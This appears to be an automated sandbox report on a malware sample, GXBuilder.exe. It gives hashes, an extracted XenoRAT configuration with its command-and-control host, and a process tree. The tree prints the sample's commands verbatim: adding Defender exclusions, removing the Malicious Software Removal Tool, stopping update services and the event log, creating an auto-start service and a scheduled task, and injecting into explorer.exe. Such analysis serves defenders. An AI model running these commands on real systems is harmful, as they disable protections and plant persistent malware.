Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
27/04/2024, 07:05
Static task
static1
Behavioral task
behavioral1
Sample
GXBuilder.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
GXBuilder.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral3
Sample
GXBuilder.exe
Resource
win11-20240419-en
General
-
Target
GXBuilder.exe
-
Size
12.6MB
-
MD5
f9e4ae00290e5259c78ba11b4c851417
-
SHA1
247b5c812136a40f85c106ca6441315b123f625e
-
SHA256
34ab005b549534dba9a83d9346e1618a18ecee2c99a93079551634f9480b2b79
-
SHA512
5dfce7ed791e0b44d218142d6075ecf009f186c57e02fcf5675945c2329058750cc308f8730fa0f0188b4291d9a63a8357a070c103431d32aadb345783c1ddb1
-
SSDEEP
196608:/i76SDEa0mOCb5xm4J15iY5XBx9vjnWmf58eOt6dp2wGSECksB579u5gnynV:/imJa0mN/p1599vjnXVd9pl5Ggn
Malware Config
Extracted
xenorat
jctestwindows.airdns.org
Xeno_rat_nd8913d
-
delay
5000
-
install_path
temp
-
port
45010
-
startup_name
WindowsErrorHandler
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral1/memory/2660-47-0x0000000000630000-0x000000000069C000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-58-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-85-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-119-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-117-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-115-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-113-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-111-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-109-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-107-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-105-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-103-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-101-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-99-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-97-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-95-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-93-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-91-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-89-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-87-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-83-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-81-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-79-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-77-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-75-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-73-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-70-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-68-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-66-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-64-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-62-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-60-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-56-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 behavioral1/memory/2660-55-0x0000000000630000-0x0000000000695000-memory.dmp family_zgrat_v1 -
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 8 IoCs
pid Process 2660 Ilkdt.exe 2612 WinHostMgr.exe 2724 WinErrorMgr.exe 2620 KeyGeneratorTOP.exe 2896 KeyGeneratorTOP.exe 2388 WinErrorMgr.exe 480 Process not Found 4804 bauwrdgwodhv.exe -
Loads dropped DLL 9 IoCs
pid Process 2180 GXBuilder.exe 2180 GXBuilder.exe 2180 GXBuilder.exe 2180 GXBuilder.exe 2180 GXBuilder.exe 2620 KeyGeneratorTOP.exe 2724 WinErrorMgr.exe 2896 KeyGeneratorTOP.exe 480 Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 pastebin.com 7 pastebin.com -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe WinHostMgr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe bauwrdgwodhv.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4804 set thread context of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 set thread context of 2164 4804 bauwrdgwodhv.exe 97 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5188 sc.exe 5588 sc.exe 3512 sc.exe 3640 sc.exe 3768 sc.exe 5328 sc.exe 3912 sc.exe 4024 sc.exe 4684 sc.exe 2084 sc.exe 5668 sc.exe 4512 sc.exe 2284 sc.exe 5428 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x00070000000141e6-28.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8068 schtasks.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b004de687198da01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2548 powershell.exe 2612 WinHostMgr.exe 8180 powershell.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 2612 WinHostMgr.exe 4804 bauwrdgwodhv.exe 4872 powershell.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 4804 bauwrdgwodhv.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe 2164 explorer.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 2660 Ilkdt.exe Token: SeDebugPrivilege 8180 powershell.exe Token: SeShutdownPrivilege 4120 powercfg.exe Token: SeShutdownPrivilege 4140 powercfg.exe Token: SeShutdownPrivilege 2420 powercfg.exe Token: SeShutdownPrivilege 4164 powercfg.exe Token: SeDebugPrivilege 4872 powershell.exe Token: SeShutdownPrivilege 5760 powercfg.exe Token: SeShutdownPrivilege 5780 powercfg.exe Token: SeShutdownPrivilege 5836 powercfg.exe Token: SeShutdownPrivilege 5808 powercfg.exe Token: SeLockMemoryPrivilege 2164 explorer.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2548 2180 GXBuilder.exe 28 PID 2180 wrote to memory of 2548 2180 GXBuilder.exe 28 PID 2180 wrote to memory of 2548 2180 GXBuilder.exe 28 PID 2180 wrote to memory of 2548 2180 GXBuilder.exe 28 PID 2180 wrote to memory of 2660 2180 GXBuilder.exe 30 PID 2180 wrote to memory of 2660 2180 GXBuilder.exe 30 PID 2180 wrote to memory of 2660 2180 GXBuilder.exe 30 PID 2180 wrote to memory of 2660 2180 GXBuilder.exe 30 PID 2180 wrote to memory of 2612 2180 GXBuilder.exe 31 PID 2180 wrote to memory of 2612 2180 GXBuilder.exe 31 PID 2180 wrote to memory of 2612 2180 GXBuilder.exe 31 PID 2180 wrote to memory of 2612 2180 GXBuilder.exe 31 PID 2180 wrote to memory of 2724 2180 GXBuilder.exe 32 PID 2180 wrote to memory of 2724 2180 GXBuilder.exe 32 PID 2180 wrote to memory of 2724 2180 GXBuilder.exe 32 PID 2180 wrote to memory of 2724 2180 GXBuilder.exe 32 PID 2180 wrote to memory of 2620 2180 GXBuilder.exe 33 PID 2180 wrote to memory of 2620 2180 GXBuilder.exe 33 PID 2180 wrote to memory of 2620 2180 GXBuilder.exe 33 PID 2180 wrote to memory of 2620 2180 GXBuilder.exe 33 PID 2620 wrote to memory of 2896 2620 KeyGeneratorTOP.exe 35 PID 2620 wrote to memory of 2896 2620 KeyGeneratorTOP.exe 35 PID 2620 wrote to memory of 2896 2620 KeyGeneratorTOP.exe 35 PID 2724 wrote to memory of 2388 2724 WinErrorMgr.exe 36 PID 2724 wrote to memory of 2388 2724 WinErrorMgr.exe 36 PID 2724 wrote to memory of 2388 2724 WinErrorMgr.exe 36 PID 2724 wrote to memory of 2388 2724 WinErrorMgr.exe 36 PID 2388 wrote to memory of 8068 2388 WinErrorMgr.exe 37 PID 2388 wrote to memory of 8068 2388 WinErrorMgr.exe 37 PID 2388 wrote to memory of 8068 2388 WinErrorMgr.exe 37 PID 2388 wrote to memory of 8068 2388 WinErrorMgr.exe 37 PID 3476 wrote to memory of 3688 3476 cmd.exe 49 PID 3476 wrote to memory of 3688 3476 cmd.exe 49 PID 3476 wrote to memory of 3688 3476 cmd.exe 49 PID 5152 wrote to memory of 5308 5152 cmd.exe 79 PID 5152 wrote to memory of 5308 5152 cmd.exe 79 PID 5152 wrote to memory of 5308 5152 cmd.exe 79 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 1844 4804 bauwrdgwodhv.exe 94 PID 4804 wrote to memory of 2164 4804 bauwrdgwodhv.exe 97 PID 4804 wrote to memory of 2164 4804 bauwrdgwodhv.exe 97 PID 4804 wrote to memory of 2164 4804 bauwrdgwodhv.exe 97 PID 4804 wrote to memory of 2164 4804 bauwrdgwodhv.exe 97 PID 4804 wrote to memory of 2164 4804 bauwrdgwodhv.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\GXBuilder.exe"C:\Users\Admin\AppData\Local\Temp\GXBuilder.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAegB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAeABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AeAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAcABhACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2660
-
-
C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2612 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8180
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:3688
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3768
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:3912
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:4024
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GMDTJRUT"3⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"3⤵
- Launches sc.exe
PID:4512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:4684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GMDTJRUT"3⤵
- Launches sc.exe
PID:2284
-
-
-
C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9463.tmp" /F4⤵
- Creates scheduled task(s)
PID:8068
-
-
-
-
C:\Users\Admin\AppData\Roaming\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorTOP.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Roaming\KeyGeneratorTOP.exe"C:\Users\Admin\AppData\Roaming\KeyGeneratorTOP.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2896
-
-
-
C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exeC:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:5152 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:5308
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5188
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5428
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5668
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5760
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5780
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5808
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:5836
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1844
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
42KB
MD5d499e979a50c958f1a67f0e2a28af43d
SHA11e5fa0824554c31f19ce01a51edb9bed86f67cf0
SHA256bc3d545c541e42420ce2c2eabc7e5afab32c869a1adb20adb11735957d0d0b0e
SHA512668047f178d82bebefeb8c2e7731d34ff24dc755dacd3362b43d8b44c6b148fc51af0d0ab2d0a67f0344ab6158b883fe568e4eeb0e34152108735574f0e1e763
-
Filesize
6.7MB
MD548ebfefa21b480a9b0dbfc3364e1d066
SHA1b44a3a9b8c585b30897ddc2e4249dfcfd07b700a
SHA2560cc4e557972488eb99ea4aeb3d29f3ade974ef3bcd47c211911489a189a0b6f2
SHA5124e6194f1c55b82ee41743b35d749f5d92a955b219decacf9f1396d983e0f92ae02089c7f84a2b8296a3062afa3f9c220da9b7cd9ed01b3315ea4a953b4ecc6ce
-
Filesize
1KB
MD57f673f709ab0e7278e38f0fd8e745cd4
SHA1ac504108a274b7051e3b477bcd51c9d1a4a01c2c
SHA256da5ab3278aaa04fbd51272a617aef9b903ca53c358fac48fc0f558e257e063a4
SHA512e932ccbd9d3ec6ee129f0dab82710904b84e657532c5b623d3c7b3b4ce45732caf8ff5d7b39095cf99ecf97d4e40dd9d755eb2b89c8ede629b287c29e41d1132
-
Filesize
6.9MB
MD5bd0e4823fbfed11abb6994db7d0e6c09
SHA18694f5a67686070fc81445edebef8ead6c38aca8
SHA256a83dc0d4764f8e41e061dd4e331f341b09cc994fc339fed2445692df7b98affe
SHA51237f7e77407571c8f4ac298a4580610b0787e7cf8c8993e6816895a1caa71e0c4d97b72f525b9f054071fbf14bf9e87c48c67b39dcc01448213a995d036ff84e0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5PRYZNP9YROMCOOVYMT2.temp
Filesize7KB
MD573d69128d52c52739d21d634f4f1b865
SHA1841aa14a6c5c6939b2323e61307e9f1f3c609823
SHA25676ad385bb37bc6fee7ad0b5272a9a43421f4fb2d9dca41844b831223ac38c282
SHA512a5619b54fd4abfeb30106bfd95216f49ceb11de010534a483c84b623c098fab2a588bcaa47baa2d238a616f39e10f7e0d855a0094060f1a72ec00d72a46106c7
-
Filesize
191KB
MD5e004a568b841c74855f1a8a5d43096c7
SHA1b90fd74593ae9b5a48cb165b6d7602507e1aeca4
SHA256d49013d6be0f0e727c0b53bce1d3fed00656c7a2836ceef0a9d4cb816a5878db
SHA512402dd4d4c57fb6f5c7a531b7210a897dfe41d68df99ae4d605944f6e5b2cecaafa3fe27562fe45e7e216a7c9e29e63139d4382310b41f04a35ad56115fbed2af
-
Filesize
5.0MB
MD5e222309197c5e633aa8e294ba4bdcd29
SHA152b3f89a3d2262bf603628093f6d1e71d9cc3820
SHA256047a7ca1b8848c1c0e3c0fcc6ece056390760b24580f27f6966b86b0c2a1042b
SHA5129eb37686e0cee9ec18d12a4edd37c8334d26650c74eae5b30231c2b0db1628d52848123c9348c3da306ec950b827ec0a56cdf43ee325a9e280022c68193d8503